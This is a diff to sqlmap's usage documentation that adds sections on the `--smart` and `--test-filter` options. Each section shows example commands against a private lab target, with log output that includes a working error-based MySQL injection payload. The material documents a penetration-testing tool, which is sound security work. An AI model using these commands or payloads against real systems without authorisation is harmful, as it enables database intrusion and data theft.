sqlmapproject/sqlmap/Usage.md

     [11:12:17] [INFO] target URL appears to have 3 columns in query [...]

+### Conduct through tests only if positive heuristic(s)

+Switch `--smart`

+There are cases when user has a large list of potential target URLs (e.g. provided with option `-m`) and he wants to find a vulnerable target as fast as possible.
+If switch `--smart` is used, only parameters with which DBMS error(s) can be provoked, are being used further in scans.
+Otherwise they are skipped.

+Example against a MySQL target:

+    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?ca=17&user=foo&id=1" --batch --smart
+    [...]
+    [16:12:14] [INFO] testing if GET parameter 'ca' is dynamic [16:12:14] [WARNING] GET parameter 'ca' does not appear dynamic [16:12:14] [WARNING] heuristic (basic) test shows that GET parameter 'ca' might not be injectable [16:12:14] [INFO] skipping GET parameter 'ca'
+    [16:12:14] [INFO] testing if GET parameter 'user' is dynamic [16:12:14] [WARNING] GET parameter 'user' does not appear dynamic [16:12:14] [WARNING] heuristic (basic) test shows that GET parameter 'user' might not be injectable [16:12:14] [INFO] skipping GET parameter 'user'
+    [16:12:14] [INFO] testing if GET parameter 'id' is dynamic [16:12:14] [INFO] confirming that GET parameter 'id' is dynamic [16:12:14] [INFO] GET parameter 'id' is dynamic [16:12:14] [WARNING] reflective value(s) found and filtering out [16:12:14] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [16:12:14] [INFO] testing for SQL injection on GET parameter 'id' heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'.
+Do you want to skip test payloads specific for other DBMSes?
+[Y/n] Y do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)?
+[Y/n] Y [16:12:14] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' [16:12:14] [INFO] GET parameter 'id' is 'AND boolean-based blind - WHERE or HAVING clause' injectable [16:12:14] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' [16:12:14] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable [16:12:14] [INFO] testing 'MySQL inline queries'
+    [16:12:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
+    [16:12:14] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)' [16:12:14] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
+    [16:12:24] [INFO] GET parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable [16:12:24] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' [16:12:24] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other potential injection technique found
+    [16:12:24] [INFO] ORDER BY technique seems to be usable.
+This should reduce the time needed to find the right number of query columns.
+Automatically extending the range for current UNION query injection technique test
+    [16:12:24] [INFO] target URL appears to have 3 columns in query [16:12:24] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable [...]

+### Select tests by payloads and/or titles

+Option `--test-filter`

+In case that you want to filter tests by their payloads and/or titles you can use this option.
+For example, if you want to test all payloads which have `ROW` keyword inside, you can use `--test-filter=ROW`.

+Example against a MySQL target:

+    $ python sqlmap.py -u "http://192.168.21.128/sqlmap/mysql/get_int.php?id=1" --batch --test-filter=ROW
+    [...]
+    [16:16:39] [INFO] GET parameter 'id' is dynamic [16:16:39] [WARNING] reflective value(s) found and filtering out [16:16:39] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL') [16:16:39] [INFO] testing for SQL injection on GET parameter 'id' [16:16:39] [INFO] testing 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' [16:16:39] [INFO] GET parameter 'id' is 'MySQL >= 4.1 AND error-based - WHERE or HAVING clause' injectable GET parameter 'id' is vulnerable.
+Do you want to keep testing the others (if any)? [y/N] N sqlmap identified the following injection points with a total of 3 HTTP(s) requests:
+    ---
+    Place: GET
+    Parameter: id
+        Type: error-based
+        Title: MySQL >= 4.1 AND error-based - WHERE or HAVING clause
+        Payload: id=1 AND ROW(4959,4971)>(SELECT COUNT(*),CONCAT(0x3a6d70623a,(SELECT (CASE WHEN (4959=4959) THEN 1 ELSE 0 END)),0x3a6b7a653a,FLOOR(RAND(0)*2))x FROM (SELECT 4706 UNION SELECT 3536 UNION SELECT 7442 UNION SELECT 3470)a GROUP BY x)
+    ---
+    [...]

 ### Simple wizard interface for beginner users

 Switch: `--wizard`